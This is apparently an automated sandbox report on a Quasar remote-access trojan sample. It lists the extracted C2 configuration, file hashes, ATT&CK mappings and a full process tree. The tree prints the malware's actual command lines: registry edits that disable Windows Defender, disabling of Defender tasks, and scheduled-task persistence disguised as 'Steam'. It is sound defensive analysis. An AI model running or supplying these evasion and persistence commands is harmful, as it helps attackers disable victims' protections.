quasar | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90

Analysis

max time kernel
9s
max time network
26s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
10-03-2022 18:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe
Size

6.2MB
MD5

942b78bcd8a5aa6d10436832b1260671
SHA1

e35e87e58f94e304dd0b97e9b85c6cb30146978d
SHA256

50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90
SHA512

89baba3a305d1d6969b68e4f63c294a861fc755f65ac6d0f5a67f7d6b7aa26cd852f78ce0441af489a70991a9cd0887388687d89efd0f1fb95fb316490d030e3

Score

10^/10

quasar windows security notification spyware trojan

Malware Config

Extracted

Family

quasar

Version

2.1.0.0

Botnet

Windows Security Notification

minecraftgaming009-61323.portmap.io:61323

Mutex

VNM_MUTEX_c2q7y2ayYutZ2XaYe7

Attributes

encryption_key
1oSvdU99XhcwnNYl3rB8
install_name
Windows Security Notification.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows Security Notification
subdirectory
SubDir

Signatures

Contains code to disable Windows Defender 5 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral2/files/0x000700000001e83c-142.dat	disable_win_def
behavioral2/files/0x000700000001e83c-141.dat	disable_win_def
behavioral2/memory/1408-147-0x0000000000670000-0x0000000000706000-memory.dmp	disable_win_def
behavioral2/files/0x000500000001e8c6-174.dat	disable_win_def
behavioral2/files/0x000500000001e8c6-173.dat	disable_win_def

Quasar Payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/files/0x000700000001e83c-142.dat	family_quasar
behavioral2/files/0x000700000001e83c-141.dat	family_quasar
behavioral2/memory/1408-147-0x0000000000670000-0x0000000000706000-memory.dmp	family_quasar
behavioral2/files/0x000500000001e8c6-174.dat	family_quasar
behavioral2/files/0x000500000001e8c6-173.dat	family_quasar

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Executes dropped EXE 5 IoCs

Processes:

Uawisdwhppyu.exeKnfk.exeRtsveoxqatvjs.exeMtwgkvm.exeLzmicakkfbw.exe

pid	Process
1160	Uawisdwhppyu.exe
3828	Knfk.exe
3976	Rtsveoxqatvjs.exe
536	Mtwgkvm.exe
1408	Lzmicakkfbw.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
13	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
1324	3976	WerFault.exe	81
4716	4260	WerFault.exe	97

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
1072	schtasks.exe
4168	schtasks.exe
2128	schtasks.exe
3092	schtasks.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

Rtsveoxqatvjs.exe

pid	Process
3976	Rtsveoxqatvjs.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

Rtsveoxqatvjs.exe

description	pid	Process
Token: SeDebugPrivilege	3976	Rtsveoxqatvjs.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe

description	pid	Process	procid_target
PID 2620 wrote to memory of 1160	2620	50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe	79
PID 2620 wrote to memory of 1160	2620	50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe	79
PID 2620 wrote to memory of 1160	2620	50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe	79
PID 2620 wrote to memory of 3828	2620	50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe	80
PID 2620 wrote to memory of 3828	2620	50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe	80
PID 2620 wrote to memory of 3828	2620	50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe	80
PID 2620 wrote to memory of 3976	2620	50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe	81
PID 2620 wrote to memory of 3976	2620	50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe	81
PID 2620 wrote to memory of 3976	2620	50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe	81
PID 2620 wrote to memory of 536	2620	50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe	82
PID 2620 wrote to memory of 536	2620	50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe	82
PID 2620 wrote to memory of 1408	2620	50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe	83
PID 2620 wrote to memory of 1408	2620	50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe	83
PID 2620 wrote to memory of 1408	2620	50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe	83

C:\Users\Admin\AppData\Local\Temp\50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe
"C:\Users\Admin\AppData\Local\Temp\50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2620
- C:\Users\Admin\AppData\Local\Temp\Uawisdwhppyu.exe
  "C:\Users\Admin\AppData\Local\Temp\Uawisdwhppyu.exe"
  2⤵
  - Executes dropped EXE
  PID:1160
- C:\Users\Admin\AppData\Local\Temp\Knfk.exe
  "C:\Users\Admin\AppData\Local\Temp\Knfk.exe"
  2⤵
  - Executes dropped EXE
  PID:3828
- - C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
    "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4EpeebWszwq3L5jgvisNmyvGbyVAfjjb/WhkVRHM1jSY9bDQBPQUlA+KOt+q65oQzJt9yxASNarn9KPWpl7VpeJNaoB2sh/pMWGpfd1hNghc5haR0kkZkRiX8yULrHRxs=
    3⤵
    PID:2208
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"
    3⤵
    PID:2368
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:5036
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      PID:4660
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      PID:636
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      4⤵
      PID:928
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      PID:1460
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      PID:1808
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      PID:908
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      PID:1300
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      PID:2260
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      PID:1456
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤
      4⤵
      PID:2272
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      PID:2060
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      4⤵
      PID:3864
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:2968
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:4832
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      4⤵
      PID:3060
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:3648
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:3444
- C:\Users\Admin\AppData\Local\Temp\Rtsveoxqatvjs.exe
  "C:\Users\Admin\AppData\Local\Temp\Rtsveoxqatvjs.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3976
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 1684
    3⤵
    - Program crash
    PID:1324
- C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe
  "C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe"
  2⤵
  - Executes dropped EXE
  PID:536
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:4168
- - C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe"
    3⤵
    PID:1576
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe" /rl HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:3092
- C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe
  "C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe"
  2⤵
  - Executes dropped EXE
  PID:1408
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:2128
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    PID:3084
- - C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe
    "C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"
    3⤵
    PID:4260
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe" /rl HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:1072
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e9Y2mEcb30PK.bat" "
      4⤵
      PID:2456
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:552
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4260 -s 2256
      4⤵
      Program crash
      PID:4716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3976 -ip 3976
1⤵
PID:592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4260 -ip 4260
1⤵
PID:2240

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Knfk.exe

MD5
32489c4b607eb2e1c843ec118e3e131c

SHA1
580bb2eae6083754608666c667a2bef8807bae50

SHA256
a0dc29aa0dbe4004f8d5e7cccbd2192826ecff163b2516fbfc5a5b27677393ea

SHA512
46ce7bbab0d1bb4e2859c9395cbba3fcd4b4e35f8c33e29576c7c1d5e08696e246609d73adaff3dbae635d5f76a2aac054cfb118cd5c1f38063278ff0dcf5f64

Download Submit
C:\Users\Admin\AppData\Local\Temp\Knfk.exe

MD5
32489c4b607eb2e1c843ec118e3e131c

SHA1
580bb2eae6083754608666c667a2bef8807bae50

SHA256
a0dc29aa0dbe4004f8d5e7cccbd2192826ecff163b2516fbfc5a5b27677393ea

SHA512
46ce7bbab0d1bb4e2859c9395cbba3fcd4b4e35f8c33e29576c7c1d5e08696e246609d73adaff3dbae635d5f76a2aac054cfb118cd5c1f38063278ff0dcf5f64

Download Submit
C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe

MD5
9bebf11c11897bd513e5656cf539421c

SHA1
35505df6a550456e2b62c379121cc567a061c40a

SHA256
ab6ee29c0c1da0171ab86189d14a2d779b4530e4d3cc0fa5fa7ff8a1cc3007b1

SHA512
7153aa819d470cdedcb7b44e5d27ffbfaf6ce42ce7628afca9f763c2273fa8a025daaa32295b48ae6ab5d09b1763b239c9ef655461f1e112f1e44881d2a758f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe

MD5
9bebf11c11897bd513e5656cf539421c

SHA1
35505df6a550456e2b62c379121cc567a061c40a

SHA256
ab6ee29c0c1da0171ab86189d14a2d779b4530e4d3cc0fa5fa7ff8a1cc3007b1

SHA512
7153aa819d470cdedcb7b44e5d27ffbfaf6ce42ce7628afca9f763c2273fa8a025daaa32295b48ae6ab5d09b1763b239c9ef655461f1e112f1e44881d2a758f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe

MD5
763219de0d4f42f844c1e7ab0fe81694

SHA1
657a2061d0bcffa65be1378a98a45a465cb972de

SHA256
a4c1eb613f0d180ffd0c0320846570a73408c0a4c327281195887a3ef8471615

SHA512
bda3bea4ac9e8debd49f8da5f07e68398bf777eec164f24ef13a88fed55a262c7a675848c2fdf817b082e112ae620d0b08b585d43d22d0eabbb15cf879814418

Download Submit
C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe

MD5
763219de0d4f42f844c1e7ab0fe81694

SHA1
657a2061d0bcffa65be1378a98a45a465cb972de

SHA256
a4c1eb613f0d180ffd0c0320846570a73408c0a4c327281195887a3ef8471615

SHA512
bda3bea4ac9e8debd49f8da5f07e68398bf777eec164f24ef13a88fed55a262c7a675848c2fdf817b082e112ae620d0b08b585d43d22d0eabbb15cf879814418

Download Submit
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe

MD5
88ab0bb59b0b20816a833ba91c1606d3

SHA1
72c09b7789a4bac8fee41227d101daed8437edeb

SHA256
f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312

SHA512
05cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857

Download Submit
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe

MD5
88ab0bb59b0b20816a833ba91c1606d3

SHA1
72c09b7789a4bac8fee41227d101daed8437edeb

SHA256
f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312

SHA512
05cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rtsveoxqatvjs.exe

MD5
56646d2cc610318f5ce9c935cd96206e

SHA1
532d88094f3d3f7660633361ee997f01e068811d

SHA256
e4486513f738b68a651b9daf770c485959b0e2d777d37d4daf9fc1424beee231

SHA512
9372681e7e2034c3857e403187170f6d060b0f002bdb3157438bfa44b8d6d1898e24d7c20c6f6b6da4a65bea512bef54a7b3f9c6635ef8eda67ad774da37df16

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rtsveoxqatvjs.exe

MD5
56646d2cc610318f5ce9c935cd96206e

SHA1
532d88094f3d3f7660633361ee997f01e068811d

SHA256
e4486513f738b68a651b9daf770c485959b0e2d777d37d4daf9fc1424beee231

SHA512
9372681e7e2034c3857e403187170f6d060b0f002bdb3157438bfa44b8d6d1898e24d7c20c6f6b6da4a65bea512bef54a7b3f9c6635ef8eda67ad774da37df16

Download Submit
C:\Users\Admin\AppData\Local\Temp\Uawisdwhppyu.exe

MD5
51f1906c1fb394547f59bd2f99584254

SHA1
919fa344ba5f4837a5b67b4e9d04f3b978233992

SHA256
3f970a61cb1b0218df32551a996da0fa48e56b8c7c03edc4a4fd72d3b1fd9537

SHA512
25dddd6b3016d85fd8e90c760bef816aac981ded1853a7eb28fc88cff2cdaba0de2abfc3d8b490af2a415ff1121e1de0befc39fe277bfed67bd4c1062e961b05

Download Submit
C:\Users\Admin\AppData\Local\Temp\Uawisdwhppyu.exe

MD5
51f1906c1fb394547f59bd2f99584254

SHA1
919fa344ba5f4837a5b67b4e9d04f3b978233992

SHA256
3f970a61cb1b0218df32551a996da0fa48e56b8c7c03edc4a4fd72d3b1fd9537

SHA512
25dddd6b3016d85fd8e90c760bef816aac981ded1853a7eb28fc88cff2cdaba0de2abfc3d8b490af2a415ff1121e1de0befc39fe277bfed67bd4c1062e961b05

Download Submit
C:\Users\Admin\AppData\Local\Temp\config

MD5
5cf0b95f68c3304427f858db1cdde895

SHA1
a0c5c3872307e9497f8868b9b8b956b9736a9cdf

SHA256
353de1200b65a2e89e84b32067a908103cca22ad2e51ba62c171eef3c25b73aa

SHA512
5c11c4ebcd4663d02ee3ffc19b7ec83b953dca7a7a1d2b63edaab72425a61e926ac940d99f2faa6b1baba0d28068e8f3ae64105990e0a0626ba02d8f979b455b

Download Submit
C:\Users\Admin\AppData\Local\Temp\dav.bat

MD5
fc3c88c2080884d6c995d48e172fbc4f

SHA1
cb1dcc479ad2533f390786b0480f66296b847ad3

SHA256
1637ce704a463bd3c91a38aa02d1030107670f91ee3f0dd4fa13d07a77ba2664

SHA512
4807d3bd44a3197d1a9dcf709a1e70e1cf3bf71fe1a9fa1479441b598154c282a620208557a4415a34d23ceb4fd32dda41edbb940b46acb2f00c696648703bf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\e9Y2mEcb30PK.bat

MD5
af123772b194f83cce6113c8515bb7bc

SHA1
a73a39a0c181d9aba10bc2a4f39a8d84e54cee97

SHA256
7d581c5a6c9653b9104743c89999a21e1ef779d8a4066a98f2be48dc7433c88f

SHA512
b62d0eb47ab8f56783cf9e7350b44ba74927e43d3608542d77b008cfd8bd0a9bb284dd2be5f2e3cedda67da35e38004bf5a117d75e80bdf2b2de715b7acfc018

Download Submit
C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe

MD5
763219de0d4f42f844c1e7ab0fe81694

SHA1
657a2061d0bcffa65be1378a98a45a465cb972de

SHA256
a4c1eb613f0d180ffd0c0320846570a73408c0a4c327281195887a3ef8471615

SHA512
bda3bea4ac9e8debd49f8da5f07e68398bf777eec164f24ef13a88fed55a262c7a675848c2fdf817b082e112ae620d0b08b585d43d22d0eabbb15cf879814418

Download Submit
C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe

MD5
763219de0d4f42f844c1e7ab0fe81694

SHA1
657a2061d0bcffa65be1378a98a45a465cb972de

SHA256
a4c1eb613f0d180ffd0c0320846570a73408c0a4c327281195887a3ef8471615

SHA512
bda3bea4ac9e8debd49f8da5f07e68398bf777eec164f24ef13a88fed55a262c7a675848c2fdf817b082e112ae620d0b08b585d43d22d0eabbb15cf879814418

Download Submit
C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe

MD5
9bebf11c11897bd513e5656cf539421c

SHA1
35505df6a550456e2b62c379121cc567a061c40a

SHA256
ab6ee29c0c1da0171ab86189d14a2d779b4530e4d3cc0fa5fa7ff8a1cc3007b1

SHA512
7153aa819d470cdedcb7b44e5d27ffbfaf6ce42ce7628afca9f763c2273fa8a025daaa32295b48ae6ab5d09b1763b239c9ef655461f1e112f1e44881d2a758f4

Download Submit
C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe

MD5
9bebf11c11897bd513e5656cf539421c

SHA1
35505df6a550456e2b62c379121cc567a061c40a

SHA256
ab6ee29c0c1da0171ab86189d14a2d779b4530e4d3cc0fa5fa7ff8a1cc3007b1

SHA512
7153aa819d470cdedcb7b44e5d27ffbfaf6ce42ce7628afca9f763c2273fa8a025daaa32295b48ae6ab5d09b1763b239c9ef655461f1e112f1e44881d2a758f4

Download Submit
memory/536-143-0x0000000000950000-0x0000000000974000-memory.dmp

Filesize
144KB

Download
memory/536-160-0x000000001CCE0000-0x000000001CCE2000-memory.dmp

Filesize
8KB

Download
memory/536-145-0x00007FFB177A0000-0x00007FFB18261000-memory.dmp

Filesize
10.8MB

Download
memory/536-166-0x000000001C980000-0x000000001C9BC000-memory.dmp

Filesize
240KB

Download
memory/536-164-0x00000000028B0000-0x00000000028C2000-memory.dmp

Filesize
72KB

Download
memory/1160-163-0x0000000004E00000-0x0000000004E92000-memory.dmp

Filesize
584KB

Download
memory/1160-162-0x0000000004E00000-0x0000000004E92000-memory.dmp

Filesize
584KB

Download
memory/1160-149-0x0000000074B60000-0x0000000075310000-memory.dmp

Filesize
7.7MB

Download
memory/1160-152-0x0000000004EE0000-0x0000000004F72000-memory.dmp

Filesize
584KB

Download
memory/1160-156-0x0000000004EC0000-0x0000000004ECA000-memory.dmp

Filesize
40KB

Download
memory/1160-148-0x0000000000290000-0x0000000000642000-memory.dmp

Filesize
3.7MB

Download
memory/1408-150-0x00000000055B0000-0x0000000005B54000-memory.dmp

Filesize
5.6MB

Download
memory/1408-147-0x0000000000670000-0x0000000000706000-memory.dmp

Filesize
600KB

Download
memory/1408-154-0x0000000004F40000-0x0000000004F41000-memory.dmp

Filesize
4KB

Download
memory/1408-165-0x0000000005EE0000-0x0000000005EF2000-memory.dmp

Filesize
72KB

Download
memory/1408-157-0x0000000074B60000-0x0000000075310000-memory.dmp

Filesize
7.7MB

Download
memory/1408-167-0x0000000006310000-0x000000000634C000-memory.dmp

Filesize
240KB

Download
memory/1576-178-0x00007FFB177A0000-0x00007FFB18261000-memory.dmp

Filesize
10.8MB

Download
memory/1576-179-0x000000001C950000-0x000000001C952000-memory.dmp

Filesize
8KB

Download
memory/2208-185-0x00000202227E0000-0x00000202227E2000-memory.dmp

Filesize
8KB

Download
memory/2208-181-0x00000202225B0000-0x0000020222626000-memory.dmp

Filesize
472KB

Download
memory/2208-193-0x0000020222720000-0x0000020222742000-memory.dmp

Filesize
136KB

Download
memory/2208-172-0x00000202068B0000-0x0000020206B8A000-memory.dmp

Filesize
2.9MB

Download
memory/2208-175-0x00007FFB177A0000-0x00007FFB18261000-memory.dmp

Filesize
10.8MB

Download
memory/2620-130-0x0000000000B60000-0x0000000001196000-memory.dmp

Filesize
6.2MB

Download
memory/2620-131-0x00007FFB177A0000-0x00007FFB18261000-memory.dmp

Filesize
10.8MB

Download
memory/2620-132-0x00000000031D0000-0x00000000031D2000-memory.dmp

Filesize
8KB

Download
memory/3084-184-0x0000000002D50000-0x0000000002D51000-memory.dmp

Filesize
4KB

Download
memory/3084-187-0x0000000002D52000-0x0000000002D53000-memory.dmp

Filesize
4KB

Download
memory/3084-194-0x0000000002D55000-0x0000000002D57000-memory.dmp

Filesize
8KB

Download
memory/3084-190-0x0000000006510000-0x000000000652E000-memory.dmp

Filesize
120KB

Download
memory/3084-180-0x0000000001500000-0x0000000001536000-memory.dmp

Filesize
216KB

Download
memory/3084-189-0x0000000005F50000-0x0000000005FB6000-memory.dmp

Filesize
408KB

Download
memory/3084-182-0x00000000057B0000-0x0000000005DD8000-memory.dmp

Filesize
6.2MB

Download
memory/3084-183-0x0000000074B60000-0x0000000075310000-memory.dmp

Filesize
7.7MB

Download
memory/3084-188-0x0000000006020000-0x0000000006042000-memory.dmp

Filesize
136KB

Download
memory/3828-158-0x0000000074B60000-0x0000000075310000-memory.dmp

Filesize
7.7MB

Download
memory/3828-151-0x0000000000510000-0x000000000080E000-memory.dmp

Filesize
3.0MB

Download
memory/3828-146-0x0000000000510000-0x000000000080E000-memory.dmp

Filesize
3.0MB

Download
memory/3828-161-0x0000000004DD0000-0x0000000004DD1000-memory.dmp

Filesize
4KB

Download
memory/3828-155-0x0000000005050000-0x00000000050B6000-memory.dmp

Filesize
408KB

Download
memory/3976-144-0x0000000000FF0000-0x0000000000FF8000-memory.dmp

Filesize
32KB

Download
memory/3976-159-0x0000000074B60000-0x0000000075310000-memory.dmp

Filesize
7.7MB

Download
memory/3976-153-0x0000000005A60000-0x0000000005A61000-memory.dmp

Filesize
4KB

Download
memory/4260-177-0x00000000057E0000-0x0000000005D84000-memory.dmp

Filesize
5.6MB

Download
memory/4260-176-0x0000000074B60000-0x0000000075310000-memory.dmp

Filesize
7.7MB

Download